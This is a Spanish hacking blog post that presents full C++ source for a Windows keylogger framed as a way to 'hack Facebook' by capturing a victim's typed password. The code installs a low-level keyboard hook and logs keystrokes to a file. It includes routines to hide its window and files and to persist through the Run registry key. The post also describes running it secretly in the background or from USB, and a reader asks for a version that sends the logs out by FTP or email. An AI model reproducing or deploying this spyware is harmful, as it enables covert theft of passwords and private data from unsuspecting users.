-¿Te unes?- ㊜Suscribete!!!

Hackear facebook con keylogger c++ capturando datos


Los programas conocidos como ‘keylogger’ tienen como finalidad registrar la actividad de un ordenador, normalmente de forma secreta a modo de espía y facilitarla a quien los instaló. Permite la supervisión de todo lo que se ha hecho en él y se puede revisar desde el propio ordenador o desde otro de forma remota.
Suele usarse como malware del tipo daemon, permitiendo que otros usuarios tengan acceso a contraseñas importantes, como los números de una tarjeta de crédito, u otro tipo de información privada que se quiera obtener.

Programa Revealer Keylogger Pro 
Keylogger con powershell en windows 
Requisitos
Sistema opertativo windows
Instalar MinGW

Instalar MinGW
Antes de seguir debes haber instalado MinGW en tu sistema Windows. Si no lo ha hecho aún, consulta el documento MinGW (G++) en esta misma sección Herramientas de desarrollo del Campus Virtual. Sigue sus instrucciones para instalar MinGW.
En los sistemas Linux G++ está instalado por defecto, así que se puede usar como se indica aquí sin necesidad de instalar nada previamente.
G++ es un compilador de línea de órdenes que compila y enlaza programas en C++, generando el correspondiente archivo ejecutable. Para poder ejecutar las órdenes de compilación de G++ necesitamos una consola (o ventana de terminal), que es una ventana de modo texto que permite dar instrucciones al sistema operativo (SO) ejecutando órdenes una por una.
El SO entiende una serie de órdenes por defecto (dir, cd, copy, move, ...), cada una con su sintaxis que hay que respetar. Y a medida que instalamos determinados programas se añaden órdenes que se pueden ejecutar en la consola. Por ejemplo, tras instalar MinGW podemos usar la orden g++ para compilar programa en C++. La orden g++ también tiene su sintaxis particular que debemos conocer y respetar para poder escribir y ejecutar las órdenes de compilación correctamente.
Uso de G++ para compilar programas en C++ 

Ejemplo :Cyber-hacking.cpp
#include
#include
using namespace std;
int main () {
  cout << "Hola, Comunidad Cyber Hacking\n";
  system ("pause");
  return 0;

}

Copiar y pegar
Copiamos el código en un editor de texto notepad++,bloc de notas.sublim text,etc.
con el nombre del proyecto ejemplo Cyber-Hacking.cpp
 Compilar cpp con  G++
Abrimos el cmd windows + r 
cmd
escribimos en la consola el siguiente comando
g++ -o Cyber-Hacking.exe Cyber-hacking.cpp

Archivo exe
Observamos que compilo sin error listo para ser ejecutado .

Keylogger

Código


#include
#include
#include

void hideWindow() {
HWND hWindow = GetConsoleWindow();
if (hWindow != NULL) {
if (IsWindowVisible(hWindow)) {
ShowWindow(hWindow, SW_HIDE);
}
CloseHandle(hWindow);
}
}

std::string Datos = "", log = "";

bool getFileNames() {
bool success = false;
char buffer[MAX_PATH] = "";
if (GetModuleFileNameA(NULL, buffer, sizeof(buffer)) == 0) {
printf("Cannot retreive the process file name\n");
}
else {
keylogger.append(buffer);
log.append(buffer);
std::size_t pos = log.rfind(".");
if (pos == std::string::npos) {
printf("Cannot set the log file name\n");
}
else {
log.erase(pos + 1).append("log");
success = true;
}
}
return success;
}

void write(std::string data) {
std::ofstream stream(log.c_str(), std::ios::app);
if (!stream.fail()) {
stream.write(data.c_str(), data.length());
}
stream.close();
}

void logTime() {
time_t now = time(NULL);
char buffer[48] = "";
if (now == -1 || strftime(buffer, sizeof(buffer), "%H:%M:%S %m-%d-%Y", localtime(&now)) == 0) {
write("");
}
else {
write(std::string(""));
}
}

void hide(std::string file) {
DWORD attr = GetFileAttributesA(file.c_str());
if (attr != INVALID_FILE_ATTRIBUTES && !(attr & FILE_ATTRIBUTE_HIDDEN)) {
SetFileAttributesA(file.c_str(), FILE_ATTRIBUTE_HIDDEN);
}
}

void hideFiles() {
hide(keylogger);
hide(log);
}

void startup() {
HKEY hKey = NULL;
if (RegCreateKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL) == ERROR_SUCCESS) {
RegSetValueExA(hKey, "keylogger", 0, REG_SZ, (LPBYTE)keylogger.c_str(), keylogger.length());
}
if (hKey != NULL) {
RegCloseKey(hKey);
}
}

bool capital = false, numLock = false, shift = false;

LRESULT CALLBACK kbProc(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HC_ACTION) {
PKBDLLHOOKSTRUCT keystroke = (PKBDLLHOOKSTRUCT)lParam;
if (keystroke->vkCode == VK_LSHIFT || keystroke->vkCode == VK_RSHIFT) {
wParam == WM_KEYDOWN ? shift = true : shift = false;
}
else if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN) {
switch (keystroke->vkCode) {
case 0x41: { write(capital ? (shift ? "a" : "A") : (shift ? "A" : "a")); break; }
case 0x42: { write(capital ? (shift ? "b" : "B") : (shift ? "B" : "b")); break; }
case 0x43: { write(capital ? (shift ? "c" : "C") : (shift ? "C" : "c")); break; }
case 0x44: { write(capital ? (shift ? "d" : "D") : (shift ? "D" : "d")); break; }
case 0x45: { write(capital ? (shift ? "e" : "E") : (shift ? "E" : "e")); break; }
case 0x46: { write(capital ? (shift ? "f" : "F") : (shift ? "F" : "f")); break; }
case 0x47: { write(capital ? (shift ? "g" : "G") : (shift ? "G" : "g")); break; }
case 0x48: { write(capital ? (shift ? "h" : "H") : (shift ? "H" : "h")); break; }
case 0x49: { write(capital ? (shift ? "i" : "I") : (shift ? "I" : "i")); break; }
case 0x4A: { write(capital ? (shift ? "j" : "J") : (shift ? "J" : "j")); break; }
case 0x4B: { write(capital ? (shift ? "k" : "K") : (shift ? "K" : "k")); break; }
case 0x4C: { write(capital ? (shift ? "l" : "L") : (shift ? "L" : "l")); break; }
case 0x4D: { write(capital ? (shift ? "m" : "M") : (shift ? "M" : "m")); break; }
case 0x4E: { write(capital ? (shift ? "n" : "N") : (shift ? "N" : "n")); break; }
case 0x4F: { write(capital ? (shift ? "o" : "O") : (shift ? "O" : "o")); break; }
case 0x50: { write(capital ? (shift ? "p" : "P") : (shift ? "P" : "p")); break; }
case 0x51: { write(capital ? (shift ? "q" : "Q") : (shift ? "Q" : "q")); break; }
case 0x52: { write(capital ? (shift ? "r" : "R") : (shift ? "R" : "r")); break; }
case 0x53: { write(capital ? (shift ? "s" : "S") : (shift ? "S" : "s")); break; }
case 0x54: { write(capital ? (shift ? "t" : "T") : (shift ? "T" : "t")); break; }
case 0x55: { write(capital ? (shift ? "u" : "U") : (shift ? "U" : "u")); break; }
case 0x56: { write(capital ? (shift ? "v" : "V") : (shift ? "V" : "v")); break; }
case 0x57: { write(capital ? (shift ? "w" : "W") : (shift ? "W" : "w")); break; }
case 0x58: { write(capital ? (shift ? "x" : "X") : (shift ? "X" : "x")); break; }
case 0x59: { write(capital ? (shift ? "y" : "Y") : (shift ? "Y" : "y")); break; }
case 0x5A: { write(capital ? (shift ? "z" : "Z") : (shift ? "Z" : "z")); break; }
case 0x30: { write(shift ? ")" : "0"); break; }
case 0x31: { write(shift ? "!" : "1"); break; }
case 0x32: { write(shift ? "@" : "2"); break; }
case 0x33: { write(shift ? "#" : "3"); break; }
case 0x34: { write(shift ? "$" : "4"); break; }
case 0x35: { write(shift ? "%" : "5"); break; }
case 0x36: { write(shift ? "^" : "6"); break; }
case 0x37: { write(shift ? "&" : "7"); break; }
case 0x38: { write(shift ? "*" : "8"); break; }
case 0x39: { write(shift ? "(" : "9"); break; }
case VK_OEM_1: { write(shift ? ":" : ";");  break; }
case VK_OEM_2: { write(shift ? "?" : "/");  break; }
case VK_OEM_3: { write(shift ? "~" : "`");  break; }
case VK_OEM_4: { write(shift ? "{" : "[");  break; }
case VK_OEM_5: { write(shift ? "|" : "\\"); break; }
case VK_OEM_6: { write(shift ? "}" : "]");  break; }
case VK_OEM_7: { write(shift ? "\"" : "'");  break; }
case VK_OEM_PLUS:   { write(shift ? "+" : "="); break; }
case VK_OEM_COMMA:  { write(shift ? "<" : ","); break; }
case VK_OEM_MINUS:  { write(shift ? "_" : "-"); break; }
case VK_OEM_PERIOD: { write(shift ? ">" : "."); break; }
case VK_SPACE:    { write(" "); break; }
case VK_NUMPAD0:  { write("0"); break; }
case VK_NUMPAD1:  { write("1"); break; }
case VK_NUMPAD2:  { write("2"); break; }
case VK_NUMPAD3:  { write("3"); break; }
case VK_NUMPAD4:  { write("4"); break; }
case VK_NUMPAD5:  { write("5"); break; }
case VK_NUMPAD6:  { write("6"); break; }
case VK_NUMPAD7:  { write("7"); break; }
case VK_NUMPAD8:  { write("8"); break; }
case VK_NUMPAD9:  { write("9"); break; }
case VK_MULTIPLY: { write("*"); break; }
case VK_ADD:      { write("+"); break; }
case VK_SUBTRACT: { write("-"); break; }
case VK_DECIMAL:  { write(","); break; }
case VK_DIVIDE:   { write("/"); break; }
case VK_BACK:     { write("[BACKSPACE]"); break; }
case VK_TAB:      { write("[TAB]");       break; }
case VK_RETURN:   { write("[ENTER]");     break; }
case VK_MENU:     { write("[ALT]");       break; }
case VK_ESCAPE:   { write("[ESC]");       break; }
case VK_PRIOR:    { write("[PG UP]");     break; }
case VK_NEXT:     { write("[PG DN]");     break; }
case VK_END:      { write("[END]");       break; }
case VK_HOME:     { write("[HOME]");      break; }
case VK_LEFT:     { write("[LEFT]");      break; }
case VK_UP:       { write("[RIGHT]");     break; }
case VK_RIGHT:    { write("[RIGHT]");     break; }
case VK_DOWN:     { write("[DOWN]");      break; }
case VK_PRINT:    { write("[PRINT]");     break; }
case VK_SNAPSHOT: { write("[PRT SC]");    break; }
case VK_INSERT:   { write("[INSERT]");    break; }
case VK_DELETE:   { write("[DELETE]");    break; }
case VK_LWIN:     { write("[WIN KEY]");   break; }
case VK_RWIN:     { write("[WIN KEY]");   break; }
case VK_CAPITAL:  { capital = !capital;   break; }
case VK_NUMLOCK:  { numLock = !numLock;   break; }
case VK_LCONTROL: { if (wParam == WM_KEYDOWN) { write("[CTRL]"); } break; }
case VK_RCONTROL: { if (wParam == WM_KEYDOWN) { write("[CTRL]"); } break; }
case VK_F1:  { write("[F1]");  break; }
case VK_F2:  { write("[F2]");  break; }
case VK_F3:  { write("[F3]");  break; }
case VK_F4:  { write("[F4]");  break; }
case VK_F5:  { write("[F5]");  break; }
case VK_F6:  { write("[F6]");  break; }
case VK_F7:  { write("[F7]");  break; }
case VK_F8:  { write("[F8]");  break; }
case VK_F9:  { write("[F9]");  break; }
case VK_F10: { write("[F10]"); break; }
case VK_F11: { write("[F11]"); break; }
case VK_F12: { write("[F12]"); break; }
default: {
DWORD dWord = keystroke->scanCode << 16;
dWord += keystroke->flags << 24;
char otherKey[16] = "";
if (GetKeyNameTextA(dWord, otherKey, sizeof(otherKey)) != 0) {
write(otherKey);
}
}
}
}
}
return CallNextHookEx(NULL, nCode, wParam, lParam);
}

void run() {
HHOOK kbHook = SetWindowsHookExA(WH_KEYBOARD_LL, kbProc, NULL, 0);
if (kbHook == NULL) {
printf("Cannot install the keyboard hook procedure\n");
}
else {
printf("Keylogger is up and running...\n");
capital = GetKeyState(VK_CAPITAL);
numLock = GetKeyState(VK_NUMLOCK);
MSG msg = { 0 };
while (GetMessage(&msg, NULL, 0, 0) != WM_QUIT) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
UnhookWindowsHookEx(kbHook);
CloseHandle(kbHook);
}
}

int main() {
// hideWindow();
SetConsoleTitle("Keylogger");
printf("#######################################################################\n");
if (getFileNames()) {
logTime();
// hideFiles();
// startup();
run();
}
return 0;
}


Keylogger archivos
Observamos que existe 3 archivos diferentes

  • keylogger.exe :es que nos ayudar a obtener las pulsaciones del teclado
  • System32Log.txt :es el archivo donde donde se guardan las pulsaciones
  • script.vbs :nos ayudara a executar en segundo plano 



Pulsaciones del teclado observamos ,en  la consola para que el usuario no pueda observar lo que aremos usaremos el archivo script.vbs para ejecutar en segundo plano

Script.vbs ejecutar archivos en segundo plano
Script VBS atacar desde un dispositivos usb 




Prueba 
Abrimos el navegador para ver las pulsaciones que dará el usuario, todo se guarda en el archivo txt
Haremos la prueba con la pagina de facebook.

Listo para obtener datos de la victima siempre cuando este instalando el archivo en nuestro ordenador



Para saber si la cuenta introduce contraseña de caracteres especiales https://www.w3schools.com/tags/ref_urlencode.asp podremos observarlo desde esta web
como ejemplo las @#~~|\ etc 

Character From Windows-1252 From UTF-8
space %20                 %20
!         %21                 %21
"         %22                 %22
#          %23                 %23
$         %24                 %24
%         %25                 %25
@        %40                 %40
A        %41                %41
B        %42                %42




Descargar


Donación paypal
ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGUN TIPO DE PROBLEMA ILEGAL.
PERMANECE LEGAL. GRACIAS!
Si tienes algún problema, deja un comentario.

Comentarios

  1. gracias por compartirlo ,no tienes una que envie atraves de ftp o servidores de correo

    ResponderEliminar

Publicar un comentario

Únete a la conversación y comparte tú Opinión

Entradas populares de este blog

Instalar DoxWeb con Termux

Termux Instalar Ngrok

Hackear contraseñas WiFi con Python fácilmente con este sencillo script

banner logo

📽video

Únete al chat

Comentarios

Blog Populares

Instalar DoxWeb con Termux

Instalar Metasploit-Framework En Android Con Termux

Termux Instalar Ngrok

Hackear contraseñas WiFi con Python fácilmente con este sencillo script

Generar combos+verificar cuentas para spotify

👻 By Blog

By Luishiño

Security

Compartir el Link

Copiar

Estamos en constante crecimiento


× IMPORTANTE!

»El autor de este blog tiene como objetivo principal facilitar el acceso a información

sobre seguridad informática, tecnología, programación, técnicas de hacking e inteligencia artificial.

Es importante destacar que el blog está destinado exclusivamente a fines educativos y NO promueve actividades ilegales.

El autor se desliga de cualquier responsabilidad sobre descargas, opiniones y comentarios de los textos que se citen en el blog.

La misión principal es compartir conocimiento responsable para mejorar la seguridad digital y promover el uso ético de la tecnología.

Se hace un llamado a los lectores para utilizar sus habilidades de manera responsable y nunca para dañar a otros.

Descarga gratis la app The Seven Codes y comparte con tus amig@s

Google play

Esta obra de Luishiño está bajo una Licencia Creative Commons Atribución-NoComercial-CompartirIgual CC BY-NC-SA 4.0 Internacional

Aviso Legal


>_Si te gustan los contenidos de este sitio,
¿Deseas realizar una aportación?
Puedes colaborar con una pequeña donación via PayPal. La forma rápida y segura de pagar en Internet. シ

Apoyar al sitio


📡Los interesados en información sobre contrato de soporte Asistencia Técnica , licencia de uso/actualizaciones de sus utilidades, contacten con The Seven Codes para hacer su presupuesto y/o consultar por el servicio al twitter:@Lpericena

Mis redes sociales

© Copyright 2020-2024 .Todos los derechos reservados
by Luishiño - The Seven Codes